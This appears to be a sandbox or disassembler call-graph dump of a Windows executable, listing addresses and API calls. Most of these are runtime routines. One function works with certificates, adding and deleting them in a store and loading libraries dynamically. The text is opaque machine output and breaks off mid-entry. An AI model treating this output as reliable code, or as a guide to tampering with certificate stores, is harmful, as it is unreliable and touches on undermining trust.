API calls 6016->6022 6023 377b72 6016->6023 6019 374949 _free 15 API calls 6017->6019 6020 37488d _abort 21 API calls 6018->6020 6021 377ba6 6019->6021 6020->6023 6024 37488d _abort 21 API calls 6021->6024 6022->6023 6024->6023 5898 37142e 5901 372e40 5898->5901 5900 37143f 5902 3745f8 _free 15 API calls 5901->5902 5903 372e57 _ValidateLocalCookies 5902->5903 5903->5900 6687 3737ad 6688 373fd9 33 API calls 6687->6688 6689 3737b5 6688->6689 6025 377e6c 6026 37537b 46 API calls 6025->6026 6027 377e71 6026->6027 6028 377569 6038 378102 6028->6038 6032 377576 6051 3783de 6032->6051 6035 3775a0 6036 3749b9 _free 15 API calls 6035->6036 6037 3775ab 6036->6037 6055 37810b 6038->6055 6040 377571 6041 37833e 6040->6041 6042 37834a ___scrt_is_nonwritable_in_current_image 6041->6042 6075 375832 EnterCriticalSection 6042->6075 6044 3783c0 6089 3783d5 6044->6089 6046 378394 DeleteCriticalSection 6049 3749b9 _free 15 API calls 6046->6049 6047 3783cc _abort 6047->6032 6050 378355 6049->6050 6050->6044 6050->6046 6076 37916c 6050->6076 6052 3783f4 6051->6052 6053 377585 DeleteCriticalSection 6051->6053 6052->6053 6054 3749b9 _free 15 API calls 6052->6054 6053->6032 6053->6035 6054->6053 6056 378117 ___scrt_is_nonwritable_in_current_image 6055->6056 6065 375832 EnterCriticalSection 6056->6065 6058 3781ba 6070 3781da 6058->6070 6061 3781c6 _abort 6061->6040 6063 378126 6063->6058 6064 3780bb 61 API calls 6063->6064 6066 3775b5 EnterCriticalSection 6063->6066 6067 3781b0 6063->6067 6064->6063 6065->6063 6066->6063 6073 3775c9 LeaveCriticalSection 6067->6073 6069 3781b8 6069->6063 6074 37587a LeaveCriticalSection 6070->6074 6072 3781e1 6072->6061 6073->6069 6074->6072 6075->6050 6077 379178 ___scrt_is_nonwritable_in_current_image 6076->6077 6078 37919e 6077->6078 6079 379189 6077->6079 6088 379199 _abort 6078->6088 6092 3775b5 EnterCriticalSection 6078->6092 6080 374949 _free 15 API calls 6079->6080 6081 37918e 6080->6081 6083 37488d _abort 21 API calls 6081->6083 6083->6088 6084 3791ba 6093 3790f6 6084->6093 6086 3791c5 6109 3791e2 6086->6109 6088->6050 6347 37587a LeaveCriticalSection 6089->6347 6091 3783dc 6091->6047 6092->6084 6094 379103 6093->6094 6095 379118 6093->6095 6096 374949 _free 15 API calls 6094->6096 6101 379113 6095->6101 6112 378055 6095->6112 6097 379108 6096->6097 6099 37488d _abort 21 API calls 6097->6099 6099->6101 6101->6086 6102 3783de 15 API calls 6103 379134 6102->6103 6118 37747b 6103->6118 6105 37913a 6125 379e9e 6105->6125 6108 3749b9 _free 15 API calls 6108->6101 6346 3775c9 LeaveCriticalSection 6109->6346 6111 3791ea 6111->6088 6113 37806d 6112->6113 6115 378069 6112->6115 6114 37747b 21 API calls 6113->6114 6113->6115 6116 37808d 6114->6116 6115->6102 6140 378af7 6116->6140 6119 377487 6118->6119 6120 37749c 6118->6120 6121 374949 _free 15 API calls 6119->6121 6120->6105 6122 37748c 6121->6122 6123 37488d _abort 21 API calls 6122->6123 6124 377497 6123->6124 6124->6105 6126 379ec2 6125->6126 6127 379ead 6125->6127 6129 379efd 6126->6129 6134 379ee9 6126->6134 6128 374936 __dosmaperr 15 API calls 6127->6128 6131 379eb2 6128->6131 6130 374936 __dosmaperr 15 API calls 6129->6130 6132 379f02 6130->6132 6133 374949 _free 15 API calls 6131->6133 6135 374949 _free 15 API calls 6132->6135 6138 379140 6133->6138 6303 379e76 6134->6303 6137 379f0a 6135->6137 6139 37488d _abort 21 API calls 6137->6139 6138->6101 6138->6108 6139->6138 6141 378b03 ___scrt_is_nonwritable_in_current_image 6140->6141 6142 378b0b 6141->6142 6145 378b23 6141->6145 6165 374936 6142->6165 6144 378bc1 6147 374936 __dosmaperr 15 API calls 6144->6147 6145->6144 6150 378b58 6145->6150 6149 378bc6 6147->6149 6148 374949 _free 15 API calls 6158 378b18 _abort 6148->6158 6151 374949 _free 15 API calls 6149->6151 6168 375e73 EnterCriticalSection 6150->6168 6153 378bce 6151->6153 6155 37488d _abort 21 API calls 6153->6155 6154 378b5e 6156 378b8f 6154->6156 6157 378b7a 6154->6157 6155->6158 6169 378be2 6156->6169 6160 374949 _free 15 API calls 6157->6160 6158->6115 6161 378b7f 6160->6161 6163 374936 __dosmaperr 15 API calls 6161->6163 6162 378b8a 6218 378bb9 6162->6218 6163->6162 6166 3745f8 _free 15 API calls 6165->6166 6167 37493b 6166->6167 6167->6148 6168->6154 6170 378c10 6169->6170 6176 378c09 _ValidateLocalCookies 6169->6176 6171 378c14 6170->6171 6172 378c33 6170->6172 6173 374936 __dosmaperr 15 API calls 6171->6173 6174 378c67 6172->6174 6175 378c84 6172->6175 6177 378c19 6173->6177 6178 374936 __dosmaperr 15 API calls 6174->6178 6180 378c9a 6175->6180 6221 3790db 6175->6221 6176->6162 6179 374949 _free 15 API calls 6177->6179 6181 378c6c 6178->6181 6182 378c20 6179->6182 6224 378787 6180->6224 6185 374949 _free 15 API calls 6181->6185 6186 37488d _abort 21 API calls 6182->6186 6188 378c74 6185->6188 6186->6176 6193 37488d _abort 21 API calls 6188->6193 6189 378ce1 6194 378cf5 6189->6194 6195 378d3b WriteFile 6189->6195 6190 378ca8 6191 378cce 6190->6191 6192 378cac 6190->6192 6236 378567 GetConsoleCP 6191->6236 6196 378da2 6192->6196 6231 37871a 6192->6231 6193->6176 6199 378cfd 6194->6199 6200 378d2b 6194->6200 6198 378d5e GetLastError 6195->6198 6206 378cc4 6195->6206 6196->6176 6207 374949 _free 15 API calls 6196->6207 6198->6206 6203 378d02 6199->6203 6204 378d1b 6199->6204 6256 3787fd 6200->6256 6203->6196 6245 3788dc 6203->6245 6250 3789ca 6204->6250 6206->6176 6206->6196 6209 378d7e 6206->6209 6208 378dc7 6207->6208 6211 374936 __dosmaperr 15 API calls 6208->6211 6212 378d85 6209->6212 6213 378d99 6209->6213 6211->6176 6215 374949 _free 15 API calls 6212->6215 6261 374913 6213->6261 6216 378d8a 6215->6216 6217 374936 __dosmaperr 15 API calls 6216->6217 6217->6176 6302 375e96 LeaveCriticalSection 6218->6302 6220 378bbf 6220->6158 6266 37905d 6221->6266 6288 377fff 6224->6288 6226 378797 6227 37879c 6226->6227 6228 374574 _abort 33 API calls 6226->6228 6227->6189 6227->6190 6230 3787bf 6228->6230 6229 3787dd GetConsoleMode 6229->6227 6230->6227 6230->6229 6234 378774 6231->6234 6235 37873f 6231->6235 6232 378776 GetLastError 6232->6234 6233 379251 WriteConsoleW CreateFileW 6233->6235 6234->6206 6235->6232 6235->6233 6235->6234 6237 3786dc _ValidateLocalCookies 6236->6237 6238 3785ca 6236->6238 6237->6206 6238->6237 6240 378650 WideCharToMultiByte 6238->6240 6241 377407 35 API calls __fassign 6238->6241 6244 3786a7 WriteFile 6238->6244 6297 3761a2 6238->6297 6240->6237 6242 378676 WriteFile 6240->6242 6241->6238 6242->6238 6243 3786ff GetLastError 6242->6243 6243->6237 6244->6238 6244->6243 6246 3788eb 6245->6246 6247 3789ad _ValidateLocalCookies 6246->6247 6248 378969 WriteFile 6246->6248 6247->6206 6248->6246 6249 3789af GetLastError 6248->6249 6249->6247 6255 3789d9 6250->6255 6251 378ae4 _ValidateLocalCookies 6251->6206 6252 378a5b WideCharToMultiByte 6253 378a90 WriteFile 6252->6253 6254 378adc GetLastError 6252->6254 6253->6254 6253->6255 6254->6251 6255->6251 6255->6252 6255->6253 6258 37880c 6256->6258 6257 3788bf _ValidateLocalCookies 6257->6206 6258->6257 6259 37887e WriteFile 6258->6259 6259->6258 6260 3788c1 GetLastError 6259->6260 6260->6257 6262 374936 __dosmaperr 15 API calls 6261->6262 6263 37491e _free 6262->6263 6264 374949 _free 15 API calls 6263->6264 6265 374931 6264->6265 6265->6176 6275 375f4a 6266->6275 6268 37906f 6269 379077 6268->6269 6270 379088 SetFilePointerEx 6268->6270 6271 374949 _free 15 API calls 6269->6271 6272 3790a0 GetLastError 6270->6272 6273 37907c 6270->6273 6271->6273 6274 374913 __dosmaperr 15 API calls 6272->6274 6273->6180 6274->6273 6276 375f57 6275->6276 6277 375f6c 6275->6277 6278 374936 __dosmaperr 15 API calls 6276->6278 6279 374936 __dosmaperr 15 API calls 6277->6279 6281 375f91 6277->6281 6280 375f5c 6278->6280 6282 375f9c 6279->6282 6283 374949 _free 15 API calls 6280->6283 6281->6268 6284 374949 _free 15 API calls 6282->6284 6285 375f64 6283->6285 6286 375fa4 6284->6286 6285->6268 6287 37488d _abort 21 API calls 6286->6287 6287->6285 6289 37800c 6288->6289 6290 378019 6288->6290 6291 374949 _free 15 API calls 6289->6291 6292 378025 6290->6292 6293 374949 _free 15 API calls 6290->6293 6294 378011 6291->6294 6292->6226 6295 378046 6293->6295 6294->6226 6296 37488d _abort 21 API calls 6295->6296 6296->6294 6298 374574 _abort 33 API calls 6297->6298 6299 3761ad 6298->6299 6300 377421 __fassign 33 API calls 6299->6300 6301 3761bd 6300->6301 6301->6238 6302->6220 6306 379df4 6303->6306 6305 379e9a 6305->6138 6307 379e00 ___scrt_is_nonwritable_in_current_image 6306->6307 6317 375e73 EnterCriticalSection 6307->6317 6309 379e0e 6310 379e35 6309->6310 6311 379e40 6309->6311 6318 379f1d 6310->6318 6313 374949 _free 15 API calls 6311->6313 6314 379e3b 6313->6314 6333 379e6a 6314->6333 6316 379e5d _abort 6316->6305 6317->6309 6319 375f4a 21 API calls 6318->6319 6322 379f2d 6319->6322 6320 379f33 6336 375eb9 6320->6336 6322->6320 6325 375f4a 21 API calls 6322->6325 6332 379f65 6322->6332 6323 375f4a 21 API calls 6327 379f71 CloseHandle 6323->6327 6326 379f5c 6325->6326 6329 375f4a 21 API calls 6326->6329 6327->6320 6330 379f7d GetLastError 6327->6330 6328 379fad 6328->6314 6329->6332 6330->6320 6331 374913 __dosmaperr 15 API calls 6331->6328 6332->6320 6332->6323 6345 375e96 LeaveCriticalSection 6333->6345 6335 379e74 6335->6316 6337 375f2f 6336->6337 6338 375ec8 6336->6338 6339 374949 _free 15 API calls 6337->6339 6338->6337 6344 375ef2 6338->6344 6340 375f34 6339->6340 6341 374936 __dosmaperr 15 API calls 6340->6341 6342 375f1f 6341->6342 6342->6328 6342->6331 6343 375f19 SetStdHandle 6343->6342 6344->6342 6344->6343 6345->6335 6346->6111 6347->6091 6690 379296 IsProcessorFeaturePresent 6798 373ed6 6799 3720cd ___scrt_uninitialize_crt 7 API calls 6798->6799 6800 373edd 6799->6800 5904 379a15 5905 379a3d 5904->5905 5906 379a75 5905->5906 5907 379a67 5905->5907 5908 379a6e 5905->5908 5909 379ae7 16 API calls 5907->5909 5913 379ad0 5908->5913 5911 379a6c 5909->5911 5914 379af0 5913->5914 5915 37a1bf __startOneArgErrorHandling 16 API calls 5914->5915 5916 379a73 5915->5916 5917 37a013 5918 37a01d 5917->5918 5919 37a029 5917->5919 5918->5919 5920 37a022 CloseHandle 5918->5920 5920->5919 6691 373e91 6694 37356b 6691->6694 6695 37357a 6694->6695 6696 3734c6 15 API calls 6695->6696 6697 373594 6696->6697 6698 3734c6 15 API calls 6697->6698 6699 37359f 6698->6699 6348 373550 6349 373562 6348->6349 6350 373568 6348->6350 6351 3734c6 15 API calls 6349->6351 6351->6350 6352 371f50 6354 371f6e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6352->6354 6353 371fee _ValidateLocalCookies 6354->6353 6357 372490 RtlUnwind 6354->6357 6356 372077 _ValidateLocalCookies 6357->6356 6358 37445f 6359 37447a 6358->6359 6360 37446a 6358->6360 6364 374480 6360->6364 6363 3749b9 _free 15 API calls 6363->6359 6365 374493 6364->6365 6366 374499 6364->6366 6367 3749b9 _free 15 API calls 6365->6367 6368 3749b9 _free 15 API calls 6366->6368 6367->6366 6369 3744a5 6368->6369 6370 3749b9 _free 15 API calls 6369->6370 6371 3744b0 6370->6371 6372 3749b9 _free 15 API calls 6371->6372 6373 3744bb 6372->6373 6374 3749b9 _free 15 API calls 6373->6374 6375 3744c6 6374->6375 6376 3749b9 _free 15 API calls 6375->6376 6377 3744d1 6376->6377 6378 3749b9 _free 15 API calls 6377->6378 6379 3744dc 6378->6379 6380 3749b9 _free 15 API calls 6379->6380 6381 3744e7 6380->6381 6382 3749b9 _free 15 API calls 6381->6382 6383 3744f2 6382->6383 6384 3749b9 _free 15 API calls 6383->6384 6385 374500 6384->6385 6390 374346 6385->6390 6396 374252 6390->6396 6392 37436a 6393 374396 6392->6393 6409 3742b3 6393->6409 6395 3743ba 6395->6363 6397 37425e ___scrt_is_nonwritable_in_current_image 6396->6397 6404 375832 EnterCriticalSection 6397->6404 6400 374268 6401 3749b9 _free 15 API calls 6400->6401 6403 374292 6400->6403 6401->6403 6402 37429f _abort 6402->6392 6405 3742a7 6403->6405 6404->6400 6408 37587a LeaveCriticalSection 6405->6408 6407 3742b1 6407->6402 6408->6407 6410 3742bf ___scrt_is_nonwritable_in_current_image 6409->6410 6417 375832 EnterCriticalSection 6410->6417 6412 3742c9 6413 374529 _abort 15 API calls 6412->6413 6414 3742dc 6413->6414 6418 3742f2 6414->6418 6416 3742ea _abort 6416->6395 6417->6412 6421 37587a LeaveCriticalSection 6418->6421 6420 3742fc 6420->6416 6421->6420 6801 373edf 6802 373eee 6801->6802 6806 373f02 6801->6806 6804 3749b9 _free 15 API calls 6802->6804 6802->6806 6803 3749b9 _free 15 API calls 6805 373f14 6803->6805 6804->6806 6807 3749b9 _free 15 API calls 6805->6807 6806->6803 6808 373f27 6807->6808 6809 3749b9 _free 15 API calls 6808->6809 6810 373f38 6809->6810 6811 3749b9 _free 15 API calls 6810->6811 6812 373f49 6811->6812 5921 37571e GetCommandLineA GetCommandLineW 6700 37339d 6701 37537b 46 API calls 6700->6701 6702 3733af 6701->6702 6711 37576e GetEnvironmentStringsW 6702->6711 6706 3749b9 _free 15 API calls 6708 3733ef 6706->6708 6707 3733c5 6709 3749b9 _free 15 API calls 6707->6709 6710 3733ba 6709->6710 6710->6706 6712 375785 6711->6712 6722 3757d8 6711->6722 6715 37578b WideCharToMultiByte 6712->6715 6713 3757e1 FreeEnvironmentStringsW 6714 3733b4 6713->6714 6714->6710 6723 3733f5 6714->6723 6716 3757a7 6715->6716 6715->6722 6717 37644f 16 API calls 6716->6717 6718 3757ad 6717->6718 6719 3757b4 WideCharToMultiByte 6718->6719 6720 3757ca 6718->6720 6719->6720 6721 3749b9 _free 15 API calls 6720->6721 6721->6722 6722->6713 6722->6714 6724 37340a 6723->6724 6725 37495c _abort 15 API calls 6724->6725 6735 373431 6725->6735 6726 373495 6727 3749b9 _free 15 API calls 6726->6727 6728 3734af 6727->6728 6728->6707 6729 37495c _abort 15 API calls 6729->6735 6730 373497 6732 3734c6 15 API calls 6730->6732 6733 37349d 6732->6733 6736 3749b9 _free 15 API calls 6733->6736 6734 3734b9 6737 37489d _abort 6 API calls 6734->6737 6735->6726 6735->6729 6735->6730 6735->6734 6738 3749b9 _free 15 API calls 6735->6738 6740 37401a 6735->6740 6736->6726 6739 3734c5 6737->6739 6738->6735 6741 374027 6740->6741 6742 374035 6740->6742 6741->6742 6744 37404c 6741->6744 6743 374949 _free 15 API calls 6742->6743 6748 37403d 6743->6748 6746 374047 6744->6746 6747 374949 _free 15 API calls 6744->6747 6745 37488d _abort 21 API calls 6745->6746 6746->6735 6747->6748 6748->6745 6813 374dda 6818 374e0f 6813->6818 6816 374df6 6817 3749b9 _free 15 API calls 6817->6816 6819 374e21 6818->6819 6823 374de8 6818->6823 6820 374e26 6819->6820 6821 374e51 6819->6821 6822 37495c _abort 15 API calls 6820->6822 6821->6823 6825 37696b 24 API calls 6821->6825 6824 374e2f 6822->6824 6823->6816 6823->6817 6826 3749b9 _free 15 API calls 6824->6826 6827 374e6c 6825->6827 6826->6823 6828 3749b9 _free 15 API calls 6827->6828 6828->6823 5922 374005 5923 374008 5922->5923 5924 374074 _abort 33 API calls 5923->5924 5925 374014 5924->5925 6422 372144 6425 372192 6422->6425 6426 37214f 6425->6426 6427 37219b 6425->6427 6427->6426 6434 372513 6427->6434 6430 372513 43 API calls 6431 3721e1 6430->6431 6448 373fd9 6431->6448 6454 372521 6434->6454 6436 372518 6437 3721d6 6436->6437 6438 376c64 _abort 2 API calls 6436->6438 6437->6430 6439 374079 6438->6439 6440 374085 6439->6440 6441 376cbf _abort 33 API calls 6439->6441 6442 3740ac 6440->6442 6443 37408e IsProcessorFeaturePresent 6440->6443 6441->6440 6444 3738e3 _abort 23 API calls 6442->6444 6445 374099 6443->6445 6447 3740b6 6444->6447 6446 3746c3 _abort 3 API calls 6445->6446 6446->6442 6449 373fe5 _abort 6448->6449 6450 374574 _abort 33 API calls 6449->6450 6453 373fea 6450->6453 6451 374074 _abort 33 API calls 6452 374014 6451->6452 6453->6451 6455 37252d GetLastError 6454->6455 6456 37252a 6454->6456 6466 3727f4 6455->6466 6456->6436 6459 3725a7 SetLastError 6459->6436 6460 37282f ___vcrt_FlsSetValue 6 API calls 6461 37255b 6460->6461 6462 372583 6461->6462 6463 37282f ___vcrt_FlsSetValue 6 API calls 6461->6463 6465 372561 6461->6465 6464 37282f ___vcrt_FlsSetValue 6 API calls 6462->6464 6462->6465 6463->6462 6464->6465 6465->6459 6467 372693 ___vcrt_FlsFree 5 API calls 6466->6467 6468 37280e 6467->6468 6469 372826 TlsGetValue 6468->6469 6470 372542 6468->6470 6469->6470 6470->6459 6470->6460 6470->6465 6471 371442 6472 371a6b GetModuleHandleW 6471->6472 6473 37144a 6472->6473 6474 371480 6473->6474 6475 37144e 6473->6475 6477 3738e3 _abort 23 API calls 6474->6477 6476 371459 6475->6476 6480 3738c5 6475->6480 6479 371488 6477->6479 6481 3736ae _abort 23 API calls 6480->6481 6482 3738d0 6481->6482 6482->6476 6483 378f41 6484 378f65 6483->6484 6485 378fb6 6484->6485 6488 379041 __startOneArgErrorHandling 6484->6488 6489 378fc8 6485->6489 6491 379b23 6485->6491 6487 379d7d __startOneArgErrorHandling 6488->6487 6490 37a314 16 API calls 6488->6490 6490->6487 6492 379b40 DecodePointer 6491->6492 6493 379b50 6491->6493 6492->6493 6494 379bdd 6493->6494 6495 379bd2 _ValidateLocalCookies 6493->6495 6497 379b87 6493->6497 6494->6495 6496 374949 _free 15 API calls 6494->6496 6495->6489 6496->6495 6497->6495 6498 374949 _free 15 API calls 6497->6498 6498->6495 6829 3776c0 6830 3776f9 6829->6830 6831 374949 _free 15 API calls 6830->6831 6832 377725 _ValidateLocalCookies 6830->6832 6833 377702 6831->6833 6834 37488d _abort 21 API calls 6833->6834 6835 37770d _ValidateLocalCookies 6834->6835 6749 37398f 6750 37399b ___scrt_is_nonwritable_in_current_image 6749->6750 6751 3739d2 _abort 6750->6751 6757 375832 EnterCriticalSection 6750->6757 6753 3739af 6754 37691b __fassign 15 API calls 6753->6754 6755 3739bf 6754->6755 6758 3739d8 6755->6758 6757->6753 6761 37587a LeaveCriticalSection 6758->6761 6760 3739df 6760->6751 6761->6760 5056 37130d 5057 371319 ___scrt_is_nonwritable_in_current_image 5056->5057 5084 37162c 5057->5084 5059 371320 5060 371473 5059->5060 5071 37134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5059->5071 5137 371920 IsProcessorFeaturePresent 5060->5137 5062 37147a 5063 371480 5062->5063 5141 373931 5062->5141 5144 3738e3 5063->5144 5067 371369 5071->5067 5075 3713ea 5071->5075 5121 3738f9 5071->5121 5092 371a35 5075->5092 5076 371405 5128 371a6b GetModuleHandleW 5076->5128 5079 371410 5080 371419 5079->5080 5130 3738d4 5079->5130 5133 37179d 5080->5133 5085 371635 5084->5085 5147 371bd4 IsProcessorFeaturePresent 5085->5147 5089 371646 5090 37164a 5089->5090 5157 3720cd 5089->5157 5090->5059 5217 372200 5092->5217 5095 3713f0 5096 3735a7 5095->5096 5219 37537b 5096->5219 5098 3735b0 5100 3713f8 5098->5100 5223 375706 5098->5223 5101 371000 6 API calls 5100->5101 5102 371096 CryptMsgGetParam 5101->5102 5103 3711e3 Sleep 5101->5103 5104 371162 CryptMsgGetParam 5102->5104 5105 3710bc LocalAlloc 5102->5105 5106 371215 CertCloseStore LocalFree LocalFree LocalFree 5103->5106 5112 3711f7 5103->5112 5104->5103 5107 371174 CryptMsgGetParam 5104->5107 5108 3710d7 5105->5108 5109 371156 LocalFree 5105->5109 5106->5076 5107->5103 5110 371188 CertFindAttribute CertFindAttribute 5107->5110 5111 3710e0 LocalAlloc CryptMsgGetParam 5108->5111 5109->5104 5114 3711b5 LoadLibraryA GetProcAddress 5110->5114 5115 3711b1 5110->5115 5116 371114 CertCreateCertificateContext 5111->5116 5117 37113d LocalFree 5111->5117 5112->5106 5113 37120a CertDeleteCertificateFromStore 5112->5113 5113->5112 5114->5103 5115->5103 5115->5114 5119 371126 CertAddCertificateContextToStore 5116->5119 5120 371133 CertFreeCertificateContext 5116->5120 5117->5111 5118 37114d 5117->5118 5118->5109 5119->5120 5120->5117 5122 373921 _abort 5121->5122 5123 373fd9 _abort 5121->5123 5122->5075 5124 374574 _abort 33 API calls 5123->5124 5127 373fea 5124->5127 5125 374074 _abort 33 API calls 5126 374014 5125->5126 5127->5125 5129 37140c 5128->5129 5129->5062 5129->5079 5711 3736ae 5130->5711 5132 3738df 5132->5080 5134 3717a9 ___scrt_uninitialize_crt 5133->5134 5135 371421 5134->5135 5136 3720cd ___scrt_uninitialize_crt 7 API calls 5134->5136 5135->5067 5136->5135 5138 371936 _abort 5137->5138 5139 3719e1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5138->5139 5140 371a25 _abort 5139->5140 5140->5062 5142 3736ae _abort 23 API calls 5141->5142 5143 373942 5142->5143 5143->5063 5145 3736ae _abort 23 API calls 5144->5145 5146 371488 5145->5146 5148 371641 5147->5148 5149 3720ae 5148->5149 5163 372601 5149->5163 5152 3720b7 5152->5089 5154 3720bf 5155 3720ca 5154->5155 5177 37263d 5154->5177 5155->5089 5158 3720d6 5157->5158 5159 3720e0 5157->5159 5160 3725e6 ___vcrt_uninitialize_ptd 6 API calls 5158->5160 5159->5090 5161 3720db 5160->5161 5162 37263d ___vcrt_uninitialize_locks DeleteCriticalSection 5161->5162 5162->5159 5164 37260a 5163->5164 5166 372633 5164->5166 5167 3720b3 5164->5167 5181 37286d 5164->5181 5168 37263d ___vcrt_uninitialize_locks DeleteCriticalSection 5166->5168 5167->5152 5169 3725b3 5167->5169 5168->5167 5198 37277e 5169->5198 5173 3725e3 5173->5154 5176 3725c8 5176->5154 5178 372667 5177->5178 5179 372648 5177->5179 5178->5152 5180 372652 DeleteCriticalSection 5179->5180 5180->5178 5180->5180 5186 372693 5181->5186 5184 3728a5 InitializeCriticalSectionAndSpinCount 5185 372890 5184->5185 5185->5164 5187 3726b4 5186->5187 5188 3726b0 5186->5188 5187->5188 5190 37271c GetProcAddress 5187->5190 5191 37270d 5187->5191 5193 372733 LoadLibraryExW 5187->5193 5188->5184 5188->5185 5190->5188 5191->5190 5192 372715 FreeLibrary 5191->5192 5192->5190 5194 37274a GetLastError 5193->5194 5196 37277a 5193->5196 5195 372755 ___vcrt_FlsFree 5194->5195 5194->5196 5195->5196 5197 37276b LoadLibraryExW 5195->5197 5196->5187 5197->5187 5199 372693 ___vcrt_FlsFree 5 API calls 5198->5199 5200 372798 5199->5200 5201 3727b1 TlsAlloc 5200->5201 5202 3725bd 5200->5202 5202->5176 5203 37282f 5202->5203 5204 372693 ___vcrt_FlsFree 5 API calls 5203->5204 5205 372849 5204->5205 5206 372864 TlsSetValue 5205->5206 5207 3725d6 5205->5207 5206->5207 5207->5173 5208 3725e6 5207->5208 5209 3725f0 5208->5209 5210 3725f6 5208->5210 5212 3727b9 5209->5212 5210->5176 5213 372693 ___vcrt_FlsFree 5 API calls 5212->5213 5214 3727d3 5213->5214 5215 3727eb TlsFree 5214->5215 5216 3727df 5214->5216 5215->5216 5216->5210 5218 371a48 GetStartupInfoW 5217->5218 5218->5095 5220 37538d 5219->5220 5221 375384 5219->5221 5220->5098 5226 37527a 5221->5226 5708 3756ad 5223->5708 5246 374574 GetLastError 5226->5246 5228 375287 5266 375399 5228->5266 5230 37528f 5275 37500e 5230->5275 5233 3752a6 5233->5220 5236 3752e9 5300 3749b9 5236->5300 5238 3752dc 5240 3752e4 5238->5240 5243 375301 5238->5243 5297 374949 5240->5297 5242 37532d 5242->5236 5306 374ee4 5242->5306 5243->5242 5244 3749b9 _free 15 API calls 5243->5244 5244->5242 5247 374590 5246->5247 5248 37458a 5246->5248 5252 3745df SetLastError 5247->5252 5314 37495c 5247->5314 5309 375a54 5248->5309 5252->5228 5254 3749b9 _free 15 API calls 5256 3745b0 5254->5256 5255 3745bf 5257 3745c6 5255->5257 5258 3745aa 5255->5258 5260 3745eb SetLastError 5256->5260 5326 3743e6 5257->5326 5258->5254 5331 374074 5260->5331 5263 3749b9 _free 15 API calls 5265 3745d8 5263->5265 5265->5252 5265->5260 5267 3753a5 ___scrt_is_nonwritable_in_current_image 5266->5267 5268 374574 _abort 33 API calls 5267->5268 5273 3753af 5268->5273 5270 375433 _abort 5270->5230 5272 374074 _abort 33 API calls 5272->5273 5273->5270 5273->5272 5274 3749b9 _free 15 API calls 5273->5274 5567 375832 EnterCriticalSection 5273->5567 5568 37542a 5273->5568 5274->5273 5572 3740c2 5275->5572 5278 375041 5280 375058 5278->5280 5281 375046 GetACP 5278->5281 5279 37502f GetOEMCP 5279->5280 5280->5233 5282 37644f 5280->5282 5281->5280 5283 37648d 5282->5283 5287 37645d _abort 5282->5287 5284 374949 _free 15 API calls 5283->5284 5286 3752b7 5284->5286 5285 376478 HeapAlloc 5285->5286 5285->5287 5286->5236 5289 37543b 5286->5289 5287->5283 5287->5285 5288 376ae2 _abort 2 API calls 5287->5288 5288->5287 5290 37500e 35 API calls 5289->5290 5291 37545a 5290->5291 5292 3754ab IsValidCodePage 5291->5292 5294 375461 _ValidateLocalCookies 5291->5294 5296 3754d0 _abort 5291->5296 5293 3754bd GetCPInfo 5292->5293 5292->5294 5293->5294 5293->5296 5294->5238 5609 3750e6 GetCPInfo 5296->5609 5298 3745f8 _free 15 API calls 5297->5298 5299 37494e 5298->5299 5299->5236 5301 3749c4 HeapFree 5300->5301 5302 3749ed _free 5300->5302 5301->5302 5303 3749d9 5301->5303 5302->5233 5304 374949 _free 13 API calls 5303->5304 5305 3749df GetLastError 5304->5305 5305->5302 5672 374ea1 5306->5672 5308 374f08 5308->5236 5342 375891 5309->5342 5311 375a7b 5312 375a93 TlsGetValue 5311->5312 5313 375a87 _ValidateLocalCookies 5311->5313 5312->5313 5313->5247 5320 374969 _abort 5314->5320 5315 3749a9 5317 374949 _free 14 API calls 5315->5317 5316 374994 HeapAlloc 5318 3745a2 5316->5318 5316->5320 5317->5318 5318->5258 5321 375aaa 5318->5321 5320->5315 5320->5316 5355 376ae2 5320->5355 5322 375891 _abort 5 API calls 5321->5322 5323 375ad1 5322->5323 5324 375aec TlsSetValue 5323->5324 5325 375ae0 _ValidateLocalCookies 5323->5325 5324->5325 5325->5255 5369 3743be 5326->5369 5477 376c64 5331->5477 5334 374085 5336 37408e IsProcessorFeaturePresent 5334->5336 5341 3740ac 5334->5341 5338 374099 5336->5338 5337 3738e3 _abort 23 API calls 5340 3740b6 5337->5340 5505 3746c3 5338->5505 5341->5337 5345 3758bd 5342->5345 5347 3758c1 _abort 5342->5347 5343 3758e1 5346 3758ed GetProcAddress 5343->5346 5343->5347 5345->5343 5345->5347 5348 37592d 5345->5348 5346->5347 5347->5311 5349 37594e LoadLibraryExW 5348->5349 5350 375943 5348->5350 5351 375983 5349->5351 5352 37596b GetLastError 5349->5352 5350->5345 5351->5350 5354 37599a FreeLibrary 5351->5354 5352->5351 5353 375976 LoadLibraryExW 5352->5353 5353->5351 5354->5350 5358 376b26 5355->5358 5357 376af8 _ValidateLocalCookies 5357->5320 5359 376b32 ___scrt_is_nonwritable_in_current_image 5358->5359 5364 375832 EnterCriticalSection 5359->5364 5361 376b3d 5365 376b6f 5361->5365 5363 376b64 _abort 5363->5357 5364->5361 5368 37587a LeaveCriticalSection 5365->5368 5367 376b76 5367->5363 5368->5367 5375 3742fe 5369->5375 5371 3743e2 5372 37436e 5371->5372 5386 374202 5372->5386 5374 374392 5374->5263 5376 37430a ___scrt_is_nonwritable_in_current_image 5375->5376 5381 375832 EnterCriticalSection 5376->5381 5378 374314 5382 37433a 5378->5382 5380 374332 _abort 5380->5371 5381->5378 5385 37587a LeaveCriticalSection 5382->5385 5384 374344 5384->5380 5385->5384 5387 37420e ___scrt_is_nonwritable_in_current_image 5386->5387 5394 375832 EnterCriticalSection 5387->5394 5389 374218 5395 374529 5389->5395 5391 374230 5399 374246 5391->5399 5393 37423e _abort 5393->5374 5394->5389 5396 374538 __fassign 5395->5396 5398 37455f __fassign 5395->5398 5396->5398 5402 376657 5396->5402 5398->5391 5476 37587a LeaveCriticalSection 5399->5476 5401 374250 5401->5393 5403 3766d7 5402->5403 5406 37666d 5402->5406 5405 3749b9 _free 15 API calls 5403->5405 5428 376725 5403->5428 5407 3766f9 5405->5407 5406->5403 5409 3749b9 _free 15 API calls 5406->5409 5424 3766a0 5406->5424 5408 3749b9 _free 15 API calls 5407->5408 5410 37670c 5408->5410 5413 376695 5409->5413 5414 3749b9 _free 15 API calls 5410->5414 5411 3749b9 _free 15 API calls 5416 3766cc 5411->5416 5412 376793 5417 3749b9 _free 15 API calls 5412->5417 5430 3761c8 5413->5430 5419 37671a 5414->5419 5415 3749b9 _free 15 API calls 5420 3766b7 5415->5420 5422 3749b9 _free 15 API calls 5416->5422 5423 